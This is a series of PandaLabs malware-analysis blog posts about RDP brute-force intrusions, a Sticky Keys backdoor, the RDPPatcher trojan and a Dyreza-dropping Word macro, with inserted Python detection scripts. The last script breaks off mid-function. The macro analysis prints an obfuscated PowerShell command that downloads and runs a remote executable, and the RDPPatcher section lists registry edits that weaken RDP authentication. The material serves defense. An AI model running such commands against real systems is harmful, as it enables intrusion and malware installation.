Tag Archives: PandaLabs

WYSIWYE: A User-Friendly Interface for Cybercrooks

What You See Is What You Encrypt.

The trend of installing malware on corporate networks through the Remote Desktop Protocol is booming among cybercriminals. In the last few months we have analyzed several cases of ransomware attacks directed at companies from different European countries that share this methodology and are being perpetrated by the same attackers.

Once credentials are obtained through a brute force attack on the RDP, the cybercriminals gain access to the computer.

At this point, when the goal is to deploy ransomware, attackers usually just execute the corresponding malware to start the encryption and ultimately display the ransom message. However, here we can see a more personalized type of attack.

In the intrusion analyzed, we see that the ransomware has an interface through which it can be configured according to the attacker’s preferences, starting with the email address that will appear in the ransom note that will be sent to the victim.


With this customized attack, it’s possible to hand-pick the network computers whose information the attacker would like to encrypt, choose files, self-delete upon completing the encryption, enter stealth mode, etc.


How to protect your business from customized attacks

The survival of any company in a digital environment calls for establishing a solid corporate network security strategy. Prevention in the face of unknown cybersecurity threats, with the goal of neutralizing them as soon as possible, or of blocking an attacker should he succeed in gaining entry to the system, is a top priority today.

In the present case study, from PandaLabs we blocked attack attempts that used this form of ransomware against companies protected by Adaptive Defense in Germany, Belgium, Sweden, and Spain.

Here are the MD5s of the ransomware:


A timely investment in prevention, detection, and response technologies, instead of adopting perimeter-based solutions, guarantees better preparation in the defense against cyberattacks.

The post WYSIWYE: A User-Friendly Interface for Cybercrooks appeared first on Panda Security Mediacenter.

Sticky Attacks: When the operating system turns against you

Cyber-attackers are always finding new ways of bypassing the protection systems installed on computers in order to avoid detection and steal user data. In that respect, Black Hat hackers have always turned to malware-based attacks (phishing, network worms, or the dreaded Trojans with ransomware as the most dangerous example) to reach their goals: break into companies to steal credentials and huge amounts of other data in exchange for a ransom… At least, until now.

PandaLabs has recently detected a quite clever attack targeting a company in Hungary. What makes it so special? Well, the attack does not use any malware as such, but scripts and other tools belonging to the operating system itself in order to bypass scanners. This is just another example of the increased self-confidence and professionalization we have been observing among cyber-crooks in recent months.

Analysis of a malware-less attack

First, and as has become the norm in the latest security incidents analyzed at the lab, the attack starts with the attackers launching a brute-force attack against a server with the Remote Desktop Protocol (RDP) enabled. Once they get the computer’s login credentials, they have complete access to it.

Then, the first thing that the attackers do is run the sethc.exe file with the parameter 211 from the computer’s Command Prompt window (CMD). This turns on the system’s “Sticky Keys” feature. We are sure you have seen this message before:


Next, a program called “Traffic Spirit” is downloaded and run. “Traffic Spirit” is a traffic generator application which in this case is used to make extra money out of the compromised computers.

Traffic Spirit website

Then, a self-extracting file is launched that uncompresses the following files in the %Windows%\cmdacoBin folder:

  • registery.reg
  • SCracker.bat
  • sys.bat

The attackers then proceed to run the Windows registry editor (Regedit.exe) to add the following key contained in the registery.reg file:

This key aims at ensuring that every time the Sticky Keys feature is used (sethc.exe), a file called SCracker.bat gets run. This is a batch file that implements a very simple authentication system. Running the file displays the following window:

The user name and password are obtained from two variables included in the sys.bat file:

This way, the attacker installs a backdoor on the affected machine. With this backdoor, the attacker will be able to connect to the targeted computer without having to enter the login credentials, enable the Sticky Keys feature (for example, by pressing the SHIFT key five times), and enter the relevant user name and password to open a command shell:

The command shell shortcuts will allow the attacker to access certain directories, change the console color, and make use of other typical command-line commands.

However, the attack doesn’t stop here. In their attempt to make as much profit as possible from the targeted company, the attacker installs a bitcoin miner to take advantage of every compromised computer for free money. Bitcoin mining software aims to use the victims’ computer resources to generate the virtual currency without them realizing. A cheap and very effective way to monetize computer infections.

How does the Sticky Keys feature aid cyber-crooks?

If an attacker can actually access a targeted computer via an RDP connection, what do they need a backdoor for? The answer to this question is quite simple: By installing a backdoor on the affected machine, even if the victim realizes that their system has been compromised and changes the Remote Desktop credentials, all the attacker has to do is press the SHIFT key five times to enable Sticky Keys and run the backdoor to be able to access the system again. And remember, all of this without running malware on the affected computer.
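An added example, not code from the incident or from Panda, for checking a machine for this kind of Sticky Keys hijack. The page does not reproduce the key contained in registery.reg, so the check assumes the usual mechanism: an Image File Execution Options (IFEO) "Debugger" value for sethc.exe, which makes Windows launch the named program in its place. The script parses a .reg export and reports every IFEO Debugger, listing first the accessibility binaries that Windows runs from the logon screen; it generalizes beyond sethc.exe to utilman.exe, osk.exe and the others. The .reg text inside it is constructed sample data.

```python
"""Audit a Windows .reg export for Image File Execution Options (IFEO)
'Debugger' values on accessibility binaries.

Added example, not code from the incident. ASSUMPTION: the dropped
registery.reg used the IFEO Debugger mechanism to make sethc.exe launch
SCracker.bat (the page describes that effect but does not reproduce the key).
The sample .reg text at the bottom is constructed for the demonstration.
"""
import re

# Binaries Windows launches from the logon screen (SHIFT x5, Win+U, ...);
# a Debugger value on any of them yields a pre-authentication command prompt.
ACCESSIBILITY_BINARIES = {
    "sethc.exe", "utilman.exe", "osk.exe", "magnify.exe",
    "narrator.exe", "displayswitch.exe", "atbroker.exe",
}

IFEO_KEY_RE = re.compile(r"\\Image File Execution Options\\([^\\]+)$", re.IGNORECASE)


def parse_reg(text):
    """Minimal parser for 'Windows Registry Editor Version 5.00' exports.

    Returns {key_path: {value_name: raw_value_text}}. Multi-line hex values
    (continuation lines ending in a backslash) are not needed here and are skipped.
    """
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]          # "[-HKEY...]" would mean delete-key
            keys.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        name, _, value = line.partition("=")
        name = "(Default)" if name == "@" else name.strip('"')
        keys[current][name] = value
    return keys


def reg_string(raw):
    """Turn a .reg REG_SZ literal (quoted, backslashes doubled) into the stored string."""
    return raw.strip().strip('"').replace("\\\\", "\\").replace('\\"', '"')


def find_ifeo_debuggers(reg_text):
    """Return [(exe, debugger_command, is_accessibility_binary)] for every
    IFEO key that sets a Debugger; accessibility binaries are listed first."""
    hits = []
    for key, values in parse_reg(reg_text).items():
        m = IFEO_KEY_RE.search(key)
        dbg = next((v for k, v in values.items() if k.lower() == "debugger"), None)
        if not m or dbg is None:
            continue
        exe = m.group(1).lower()
        hits.append((exe, reg_string(dbg), exe in ACCESSIBILITY_BINARIES))
    hits.sort(key=lambda h: not h[2])
    return hits


# Constructed sample: one accessibility hijack, one ordinary developer
# debugger, one IFEO key with no Debugger value (must not be reported).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="C:\\Windows\\cmdacoBin\\SCracker.bat"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="C:\\Tools\\windbg.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msedge.exe]
"DisableExceptionChainValidation"=dword:00000000
'''

if __name__ == "__main__":
    for exe, dbg, is_access in find_ifeo_debuggers(SAMPLE_REG):
        tag = "BACKDOOR?" if is_access else "review"
        print(f"[{tag}] {exe} -> {dbg}")
```

On a real host, export the key with `reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" ifeo.reg` and pass the file's text to find_ifeo_debuggers; reg.exe writes UTF-16, so open the file with encoding="utf-16". Any Debugger on an accessibility binary deserves a look, whatever program it points to.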

Adaptive Defense 360, Panda Security’s advanced cyber-security solution, was capable of stopping this targeted attack thanks to the continuous monitoring of the company’s IT network, saving the organization from serious financial and reputational harm. Protect your corporate network with the security solution that best adapts to your needs.



Compilation of PandaLabs Reports

The following is a compilation of all past PandaLabs reports. It is a complete record of the cybersecurity lab’s highlights.


Q1 Report Q2 Report Q3 Report Annual Report


Q1 Report Q2 Report Q3 Report Annual Report


Q1 Report Q2 Report Q3 Report Annual Report


Q1 Report Q2 Report Q3 Report Annual Report


Q1 Report Q2 Report Q3 Report Annual Report


Q1 Report Q2 Report Q3 Report Annual Report


Q1 Report Q2 Report Q3 Report Annual Report



RDPPatcher, the Attack that Sells Access to your Computer at a Low Price

In recent months, there has been a significant uptick in PandaLabs reports of malware that is installed using the Remote Desktop Protocol (RDP). Every day, we witness thousands of infection attempts using ransomware, hijacking systems for bitcoin mining, etc., which all have one thing in common: access via RDP after gaining entry with credentials obtained by brute force.

There are plenty of legitimate uses for RDP, but unfortunately in the wrong hands it can become a weapon for cybercriminals. We have already spoken of the shared history between RDP and ransomware, especially in the corporate environment.

The new attack discovered uses the same technique of entry, but its goal is completely different from those analyzed previously. This time, after infiltrating the system, it focuses on finding Point of Sale (POS) terminals and ATMs. The reason for this is that they are simple terminals to attack anonymously from the Internet, and the economic profit from selling the stolen information is high.

RDPPatcher: Selling system access on the black market

In the present case, the brute force attack lasted a little over two months until, in January 2017, they hit upon the correct credentials and gained access to the system. Once the system was compromised, the cybercriminals attempted to infect it with malware. They found their attempts blocked by Adaptive Defense, at which point they modified the malware and tried again, without success. Since Panda’s advanced cybersecurity solution is not based on signatures and does not rely on previous knowledge of malware in order to block it, modifying the malware didn’t change the result.

It’s clear from the malware analysis what the purpose of the attack is. The hashes of the two files are the following:

MD5  d78be752e991ccbec16f11e4fc6b2115

SHA1  4cc9d2c98f22aefab50ee217c1a0d872e93ce541

MD5  950e8614db5c567f66d0900ad09e45ac

SHA1  9355a60dd51cfd02a921444e92e012e25d0a6be

Both were written in Delphi and packed with ASPack. After unpacking them, we found that they were very similar to each other. We analyzed the most recent of them (950e8614db5c567f66d0900ad09e45ac).

This Trojan, detected as Trj/RDPPatcher.A, modifies the Windows registry in order to change the type of RDP validation. These are the entries that it modifies:

HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp /v UserAuthentication /t REG_DWORD /d 1
"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 1

And deletes the following entries if they are present in the system:

"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v legalnoticecaption /f
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v legalnoticetext /f

Subsequently, it drops another file (MD5: 78D4E9BA8F641970162260273722C887) in the %TEMP% directory. This file is a version of the application rdpwrap and is run via the runas command with the parameters "-i -s" in order to activate concurrent RDP sessions on the system.
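As an added detection example (not the malware's or Panda's code), the registry changes above can be watched for in process-creation logs whenever they are made through reg.exe. The watched values are the ones the text lists: UserAuthentication under RDP-Tcp, which controls whether Network Level Authentication is required, and the legalnoticecaption/legalnoticetext values that hold the interactive logon banner; fDenyTSConnections, the well-known switch that enables Remote Desktop, is added as a generalization. The command lines are constructed sample data that restate the page's entries as reg add/delete calls.

```python
"""Flag reg.exe invocations that change Remote Desktop logon controls,
as a process-creation-log check.

Added example, not the malware's or Panda's code. Watched values: the ones the
text lists (UserAuthentication under RDP-Tcp, i.e. the NLA requirement;
legalnoticecaption/legalnoticetext, the interactive-logon banner) plus
fDenyTSConnections, the well-known RDP on/off switch. The command lines at the
bottom are constructed sample log data.
"""
import re

# Matches "reg add|delete <key> <rest>", with or without a path/.exe on reg
REG_CMD_RE = re.compile(
    r'^\s*(?:\S*\\)?reg(?:\.exe)?\s+(?P<op>add|delete)\s+'
    r'(?:"(?P<qkey>[^"]+)"|(?P<key>\S+))(?P<rest>.*)$',
    re.IGNORECASE,
)
OPT_RE = re.compile(r'/(?P<opt>[vtd])\s+(?:"(?P<qval>[^"]*)"|(?P<val>\S+))', re.IGNORECASE)

HIVE_ALIASES = {"hkey_local_machine": "hklm", "hkey_current_user": "hkcu"}

# (key path suffix, value name, finding) -- all lower-case, compared after normalizing
WATCHLIST = [
    (r"control\terminal server\winstations\rdp-tcp", "userauthentication",
     "RDP-Tcp NLA requirement changed"),
    (r"control\terminal server", "fdenytsconnections",
     "Remote Desktop enabled or disabled"),
    (r"policies\system", "legalnoticecaption", "interactive logon banner altered"),
    (r"policies\system", "legalnoticetext", "interactive logon banner altered"),
]


def parse_reg_command(cmdline):
    """Return {'op', 'key', 'value', 'type', 'data', 'force'} or None if the
    line is not a reg add/delete invocation."""
    m = REG_CMD_RE.match(cmdline)
    if not m:
        return None
    key = (m.group("qkey") or m.group("key")).strip("\\").lower()
    hive, sep, path = key.partition("\\")
    key = HIVE_ALIASES.get(hive, hive) + sep + path     # HKEY_LOCAL_MACHINE -> hklm
    opts = {"v": None, "t": None, "d": None}
    for o in OPT_RE.finditer(m.group("rest")):
        opts[o.group("opt").lower()] = o.group("qval") if o.group("qval") is not None else o.group("val")
    return {
        "op": m.group("op").lower(), "key": key,
        "value": opts["v"].lower() if opts["v"] else None,
        "type": opts["t"], "data": opts["d"],
        "force": re.search(r"/f(?:\s|$)", m.group("rest"), re.IGNORECASE) is not None,
    }


def audit_reg_commands(cmdlines):
    """Run every command line through the watchlist; returns one finding per
    matching reg add/delete as (line_index, finding, parsed_command)."""
    findings = []
    for i, line in enumerate(cmdlines):
        cmd = parse_reg_command(line)
        if cmd is None:
            continue
        for key_suffix, value_name, finding in WATCHLIST:
            if cmd["key"].endswith(key_suffix) and cmd["value"] == value_name:
                findings.append((i, finding, cmd))
                break
    return findings


# Constructed sample lines: the three registry operations from the text
# (rewritten as reg.exe calls), one harmless reg add, one non-reg process.
SAMPLE_CMDLINES = [
    r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 1 /f',
    r'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v legalnoticecaption /f',
    r'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v legalnoticetext /f',
    r'C:\Windows\System32\reg.exe add HKCU\Software\ExampleApp /v InstallDir /t REG_SZ /d "C:\Example App" /f',
    r'C:\Windows\System32\notepad.exe C:\notes.txt',
]

if __name__ == "__main__":
    for idx, finding, cmd in audit_reg_commands(SAMPLE_CMDLINES):
        print(f"line {idx}: {finding}: reg {cmd['op']} {cmd['key']} /v {cmd['value']} (data={cmd['data']})")
```

The same watchlist applies to Sysmon registry events (EventID 12/13), which also catch changes made directly through the API rather than via reg.exe; the command-line parser only covers the reg.exe path.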

It then proceeds to profile the machine and obtain its information:

  • Username
  • Device name
  • Amount of time the device has been turned on
  • Operating system version
  • Language
  • Virtual machine
  • Memory
  • Processor name
  • Number of processor cores
  • Processor speed
  • Antivirus

It then connects to the control server (C&C server) to access a list of services that measure the speed of connection to the Internet, and later saves the data related to upload and download speed. Next it checks which antivirus is installed on the computer. Contrary to what we are accustomed to seeing in most malware attacks, it does not do this to remove the installed antivirus or to change its behavior. It is simply gathering data.

This is the list of processes it searches for, as extracted from the binary:

See Table 1

Once this is done, it begins to search for different types of software to continue profiling the computer. It mainly looks for POS, ATM, and online gambling software. What follows is a small part of the list of software that it searches for (in total there are several hundred):

See Table 2

It also combs through browsing history, where another list is contained, categorized by areas of interest:

See Table 3

These strings are searched for in the browser history by the malware itself. They are used to "label" the computer based on the software used and the webpages visited.

Once it has finished gathering data from the system, it makes a web request to the C&C. In order to hide the exfiltrated information from detection systems inspecting web traffic, it first encrypts it with AES128 using the password "[email protected]}||v*{hGqvYUG", which is embedded in the sample analyzed, and then encodes the result in base64.

Example of the encrypted request.

The C&C server used for this malware sample is located in Gibraltar:


As we have seen, the first thing the attacker seeks to do is to inventory the computer, compiling all types of information (hardware, software, webpages visited, Internet connection speed), and install an application that allows multiple RDP sessions at once. At no point does credential theft, or any other data theft, occur.

The explanation for this is very simple: the cybercriminals behind these attacks sell access to these computers for a very small fee. Being in possession of so much data from every system allows them to sell access to other groups of cybercriminals specializing in different fields. For example, groups that specialize in the theft of card data can acquire computers with POS software, and so on. Cybercrime has indeed become a profitable racket.


Malware Capable of Paralyzing an Entire Ministry Neutralized

Cyberthreats are a constant risk and affect public administrations significantly. So much so that they have become a powerful instrument of aggression against public entities and citizens. They can lead to a serious deterioration in the quality of service, and also, above all, to data leaks concerning everything from personal information to state secrets.

The combination of new technologies and the increase in the complexity of attacks, as well as the professionalization of cybercriminals, is highly dangerous. These are trends that we are predicting for 2017.

Last December, a large-scale spam campaign spanning more than ten countries was carried out, and specifically targeted a major European ministry. The attack, via phishing, was highly advanced and combined social engineering tactics with a powerful Trojan.

The attack is sent by email with an attached Word document. At first, we suspected that it was a targeted attack, since the message came, supposedly, from a healthcare company and the recipient was an employee of the Ministry of Health in a European country.

The present analysis describes the technical features of the harmful code found in the macro of the Word document. The goal of the macro was to download and run another malicious component.


Below are shown a few static properties of the analyzed files.

The hash of the Word document is the following:

MD5:  B480B7EFE5E822BD3C3C90D818502068

SHA1:  861ae1beb98704f121e28e57b429972be0410930

According to the document’s metadata, the creation date was 2016-12-19. The hashes of the malicious code downloaded by the Word document are the following:

MD5:  3ea61e934c4fb7421087f10cacb14832

SHA1:  bffb40c2520e923c7174bbc52767b3b87f7364a9


1. Infection Vectors

The Word document gets to the victim’s computer by way of a spam email purporting to come from a healthcare company. The text tricks the recipient into believing that the content is protected and that the macro needs to run in order to gain access to it.

Screen cap of the actual message


According to the data recovered by Panda Security’s Collective Intelligence, this spam campaign took place on December 19, 2016 and affected several countries.

The majority of recipients attempted to open the Word document the same day they received it, December 19.


Map of countries affected by the spam campaign


2. Interactions with the infected system

The basic function of the macro consists in downloading and running another malicious code from a URL embedded in the macro itself.

Both the macro and its strings are obfuscated. Also, the macro is designed to run as soon as the document is opened.

Part of the obfuscated code contained in the macro



Once the macro is running, the Word doc runs the following command in the system:

cmd.exe /c pOWeRsHELL.EXe   -eXecUTIONpolICy   BYPAss  -noPrOfIlE -winDowsTyle    hidDEN (NeW-oBjECt    sYstEm.NeT.webcLiENt).DOWNloAdFILE('http://xxxxxxxxxxxx.com/13obCpHRxA1t3rbMpzh7iy1awHVm1MzNTX.exe','C:\Users\????\AppData\Roaming\.Exe');STaRt-PRoCESS 'C:\Users\????\AppData\Roaming\.eXe'

The command interpreter (cmd.exe) launches PowerShell with two commands passed as parameters:

  1. The first PowerShell command downloads an EXE from this URL (to %APPDATA%\.exe): http://xxxxxxxx.com/13obCpHRxA1t3rbMpzh7iy1awHVm1MzNTX.exe
  2. This creates a file in the root of %APPDATA%.
  3. The next PowerShell command (Start-Process) is used to run the downloaded file.
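An added example (not Panda's or the campaign's code) of how a detection rule can see through this kind of obfuscation: normalize the casing and the padded whitespace, then look for the launch flags and the WebClient/Start-Process calls described in the three steps above, and treat the mixed casing of the powershell token itself as a signal. The sample command lines are constructed; the cradle one keeps the structure of the command shown above but uses a placeholder domain and drop path.

```python
"""Score a process command line for the obfuscated PowerShell download
cradle pattern used by the macro described above.

Added example, not Panda's or the campaign's code. It normalizes the
randomized casing and whitespace, then looks for the launch flags and the
WebClient/Start-Process calls the text lists. The command lines at the bottom
are constructed; the cradle one mirrors the text's structure with a
placeholder URL and drop path.
"""
import re

# Indicator regexes run on a lower-cased, whitespace-collapsed command line.
# powershell.exe accepts unique parameter prefixes, so -ep, -ex, -nop, -w ...
# are matched as well as the full names.
INDICATORS = {
    "execution_policy_bypass": re.compile(r"-(?:ex[a-z]*|ep)\s+(?:bypass|unrestricted)"),
    "no_profile":              re.compile(r"-nop[a-z]*(?:\s|$)"),
    "hidden_window":           re.compile(r"-w(?:i[a-z]*)?\s+hidden"),
    "webclient_download":      re.compile(r"\.download(?:file|string|data)\s*\("),
    "start_process":           re.compile(r"start-process|invoke-item|\biex\b|invoke-expression"),
    "encoded_command":         re.compile(r"-e(?:nc[a-z]*|c)?\s+[a-z0-9+/=]{20,}"),
}
POWERSHELL_RE = re.compile(r"(?:^|[\\\s\"'])powershell(?:\.exe)?(?:\s|$)")
URL_RE = re.compile(r"https?://[^\s'\"(),;]+", re.IGNORECASE)
WIN_PATH_RE = re.compile(r"[a-z]:\\[^'\"\s;,)]+", re.IGNORECASE)


def normalize(cmdline):
    """Lower-case and collapse runs of whitespace (the sample pads its flags
    with several spaces and mixes case to dodge plain string matches)."""
    return re.sub(r"\s+", " ", cmdline).strip().lower()


def case_flip_ratio(token):
    """Share of adjacent letter pairs whose case differs. Ordinary tokens
    score near 0; deliberately mixed tokens like pOWeRsHELL score ~0.5."""
    letters = [c for c in token if c.isalpha()]
    if len(letters) < 2:
        return 0.0
    flips = sum(1 for a, b in zip(letters, letters[1:]) if a.isupper() != b.isupper())
    return flips / (len(letters) - 1)


def analyze_cmdline(cmdline, suspicious_at=3):
    """Return indicators, extracted URLs/paths and a verdict for one command line."""
    norm = normalize(cmdline)
    result = {"is_powershell": False, "indicators": [], "urls": [], "paths": [],
              "score": 0, "verdict": "not_powershell"}
    if not POWERSHELL_RE.search(norm):
        return result
    result["is_powershell"] = True
    found = [name for name, rx in INDICATORS.items() if rx.search(norm)]
    ps_token = re.search(r"\S*powershell(?:\.exe)?", cmdline, re.IGNORECASE).group(0)
    if case_flip_ratio(ps_token) > 0.3:
        found.append("randomized_casing")
    if re.match(r"(?:\S*\\)?cmd(?:\.exe)?\s+/c\s", norm):
        found.append("launched_via_cmd_c")       # the macro's cmd.exe /c wrapper
    result["indicators"] = found
    result["urls"] = list(dict.fromkeys(URL_RE.findall(cmdline)))
    result["paths"] = list(dict.fromkeys(WIN_PATH_RE.findall(cmdline)))
    result["score"] = len(found)
    result["verdict"] = "suspicious" if len(found) >= suspicious_at else "benign"
    return result


# Constructed samples (placeholder domain and path, not the campaign's).
SAMPLE_CMDLINES = {
    "macro_cradle": (
        "cmd.exe /c pOWeRsHELL.EXe   -eXecUTIONpolICy   BYPAss  -noPrOfIlE -winDowsTyle    hidDEN "
        "(NeW-oBjECt    sYstEm.NeT.webcLiENt).DOWNloAdFILE('http://example.invalid/payload.exe',"
        "'C:\\Users\\victim\\AppData\\Roaming\\payload.exe');"
        "STaRt-PRoCESS 'C:\\Users\\victim\\AppData\\Roaming\\payload.exe'"
    ),
    "admin_script": "powershell.exe -NoProfile -File C:\\Scripts\\nightly-backup.ps1",
    "not_powershell": "notepad.exe C:\\notes.txt",
}

if __name__ == "__main__":
    for label, line in SAMPLE_CMDLINES.items():
        r = analyze_cmdline(line)
        print(f"{label}: {r['verdict']} score={r['score']} {r['indicators']} urls={r['urls']}")
```

The scoring threshold is deliberately loose: a legitimate administrative script may use -NoProfile, but it rarely combines a hidden window, a policy bypass and an in-line WebClient download, and almost never randomizes the case of its own executable name. Feeding the parent process (here winword.exe via cmd.exe) into the same rule would tighten it further.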

Thanks to the data obtained by Panda Security’s Collective Intelligence, we know that the final malicious code distributed by this campaign is a variant of the Dyreza family. Panda’s clients were protected proactively, without needing signatures or updates.

The purpose of the malicious code is to steal credentials from browsers and add the compromised machine to a botnet. It then waits for commands from the Command & Control server. These commands come from the cybercriminals who operate it, and allow the bot to download further malware and carry out all kinds of malicious actions.

Digitization in Public Administration leads to the exponential growth of the creation, storage and management of huge quantities of confidential data — data that does not allow for a single oversight.


Panda Security to Participate in This Year’s RSA Conference

This February, from the 13th to the 17th, the XXII Edition of the RSA Conference, the largest event of cyber security in the world, will be held at the San Francisco Moscone Center. Major companies, suppliers and cybersecurity gurus will gather to find solutions to their business concerns and discuss industry trends — an incomparable venue in which Panda Security will be giving advice on cybersecurity strategies.

An extensive list of national and international experts will give an array of lectures and will be present as exhibitors during the five days of the event. Among the list of cybersecurity gurus you will find Luis Corrons, technical director of PandaLabs (@Luis_Corrons), who will share his thoughts with the attendees at the Panda Security booth (4542).

In keeping with this year’s theme, “The Power of Opportunity”, we will talk not only about malware and cybersecurity predictions for 2017, but also the benefits of a strategy that combines big data and machine learning in the security of your business — cutting-edge technology that constitutes a great leap forward in advanced cybersecurity solutions and will be presented over the course of the event.

Did you know that more than 250,000 new threats are detected in our laboratory every day? We will address how to anticipate potential threats with practical examples and real cases that seem like something out of science fiction. Advanced cybersecurity and prevention are, as always,

A powerful panel of experts bringing together more than 45,000 participants and a large number of exhibitions and activities await you at the RSA Conference 2017, an event in which innovation in cybersecurity is the center of attention.

PandaLabs, the Laboratory That Has the Answers to Your Questions

PandaLabs is Panda Security’s anti-malware lab and represents the company’s nerve center in terms of malware. Luis Corrons, its technical director, is one of the experts who will be representing the company at the Panda Security booth.

The countermeasures necessary to protect Panda Security’s customers on a global scale from all types of malicious code are produced in real time and uninterruptedly at the laboratory.

PandaLabs is also responsible for the detailed analysis of all types of malware, in order to improve the protection offered to Panda Security users.

Don’t miss your chance to consult with the experts! Join us and discover the latest technologies and pioneering developments in the industry.

More Information

When: February 13-17, 2017

Tickets: Check the price list here and get your discount by presenting the Panda Exhibition Pass: XE7PANDA (redemption deadline is Thursday, February 16th)

Where: Moscone Center, San Francisco.

Panda Security will be at booth number 4542 (look for us on the map!)


Spora, a Sophisticated New Ransomware, Detected in January

A few days ago, our colleagues at G-Data published an interesting analysis of Spora, a new ransomware that appeared in January. It had first been spotted by the people at ID Ransomware, and is mainly affecting Russia. A link was published in a forum detailing the analysis results of one of the samples sent by way of spam in VirusTotal. It is an HTA file that none of the engines present there detected, neither Panda Security, nor G-Data, nor any other.

Does this mean that the 53 participants in VirusTotal are unable to detect and block this new threat? Not at all. It means that at the time of the analysis nobody had bothered to write a signature to detect a file that, besides, is actually ephemeral. The important thing is to protect users and prevent them from becoming infected. If there is no other way to accomplish this than by creating a signature, there’s not much you can do about it. But at least for some of us this seems to be completely unnecessary in most cases, as in the present one.

Taking a look at the information in our cloud, we have observed and blocked Spora detections from the first moment, without having to create signatures for it. We can confirm that indeed most of the cases are in Russia, although we have also seen cases in Japan.

These are the different hashes that we’ve seen:





Always make sure to detect threats well in advance with a good cybersecurity solution such as Panda’s Adaptive Defense 360.


It Isn’t Ransomware, But It Will Take Over Your Server Anyway

In this week’s Tales From Ransomware, we take a look at a ransomware that isn’t really ransomware. Nor even malware. But it can hijack your server anyway.

A few days ago we saw a typical Remote Desktop Protocol (RDP) attack, which led us to believe that it was similar to the attack we told you about a few months ago, in which cybercriminals use RDP to infect devices with ransomware. But we were very wrong.

First of all because instead of encrypting data, it locks the desktop with a password that the victim doesn’t know. Secondly, it does not demand a ransom (!) in exchange for the credential, but rather seeks to keep the device locked for as long as possible so that it can be used for bitcoin mining for as long as possible. And thirdly, it doesn’t use malware as such.

Once they’ve gained access to your machine by brute force (this particular server was fielding 900 attempts daily) the attacker copies a file called BySH01.zip. This in turn contains:

  • BySH01.exe (an executable built with AutoIt)
  • 7za.exe (goodware, the well-known free tool 7-Zip)
  • tcping.exe (goodware, a tool for performing TCP pings)
  • MW_C.7z (a password-protected compressed file), which contains:
    • An application (goodware) for bitcoin mining
    • An application (goodware) for locking the Windows desktop

The attacker runs the BySH01.exe file, and the following interface appears:

Кошелек – Wallet; Имя воркера – User Name; Количество ядер – Number of cores; Пароль – Password; Локация – Location; Пусть установки – Installation path; Расширения системы – Processor Extension; Порт – Port; Добавить в автозагрузку – Add to startup; Установить – Install; Удалить – Delete; Тест – Test; Пинг – Ping; Локер – Locker

With the help of our colleagues at Panda Russia, those of us who don’t know Russian can get an approximate idea of what it’s telling us from the above word list.

Basically, the bitcoin mining application uses this interface to configure how many cores to use, which processor instruction set extensions to use, which "wallet" to send the bitcoins to, etc. Once the desired configuration is selected, the attacker clicks on Установить to install and run the bitcoin mining application. The application is called CryptoNight, which was designed for mining bitcoins using CPUs.

Then they click on Локер, which installs and runs the desktop lock application. It is the commercial application Desktop Lock Express 2, modified only so that the information shown in the file’s properties is the same as that of the system file svchost.exe. Finally, it deletes all the files used in the attack except CryptoNight and Desktop Lock Express 2.

Desktop Lock Express 2, the application used by the attackers.

We detected and blocked several attacks in different countries. Examples such as this one show how, once again, cybercriminals take advantage of weak passwords that can be guessed using the brute force method over a given period of time. Malware is no longer necessary to gain access to the system, so it’s up to you to use a robust password that will keep out unwanted visitors.

Tips for the System Admin

In addition to using a solution like Adaptive Defense, which detects and prevents this kind of attack, here are a couple of pieces of advice for all administrators who have to keep RDP exposed:

  • Configure it to use a non-standard port. What 99.99% of cybercriminals do is scan the whole Internet on TCP and UDP port 3389. They might bother to scan other ports, but they do not have to, since most people do not change the default. Those who do change the port do so because they are careful about security, which probably means that their credentials are already complex enough not to be obtained by brute force within any reasonable amount of time.
  • Monitor failed RDP connection attempts. Brute force attacks can easily be identified in this way, since they use automated systems and can be seen making a new attempt every few seconds.
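For the second tip, an added example (not Panda's code) of the monitoring it describes: count Windows Security failed-logon events (Event ID 4625) per source address and flag sources that pile up failures within a short window, which is what an automated guesser looks like. The log format and the lines in it are constructed sample data, not a real export; a real deployment would read the same fields from the event XML.

```python
"""Spot RDP password-guessing in Windows Security log failed-logon events
(Event ID 4625), the check the second tip above recommends.

Added example, not Panda's code. Input is a flat one-event-per-line export
(constructed format and data below, not a real log). Logon type 10 is
RemoteInteractive (classic RDP); with Network Level Authentication enabled,
failed RDP attempts are commonly recorded as logon type 3 (network), so both
are counted.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+EventID=(?P<eid>\d+)\s+LogonType=(?P<lt>\d+)\s+"
    r"TargetUserName=(?P<user>\S+)\s+IpAddress=(?P<ip>\S+)\s*$")
RDP_LOGON_TYPES = {"10", "3"}


def parse_events(lines):
    """Yield one dict per well-formed line; malformed lines are skipped."""
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ev = m.groupdict()
        ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
        yield ev


def detect_bruteforce(lines, threshold=5, window=timedelta(minutes=5)):
    """Return {ip: summary} for every source that produced at least
    `threshold` RDP logon failures inside any `window`-long interval."""
    per_ip = defaultdict(list)
    for ev in parse_events(lines):
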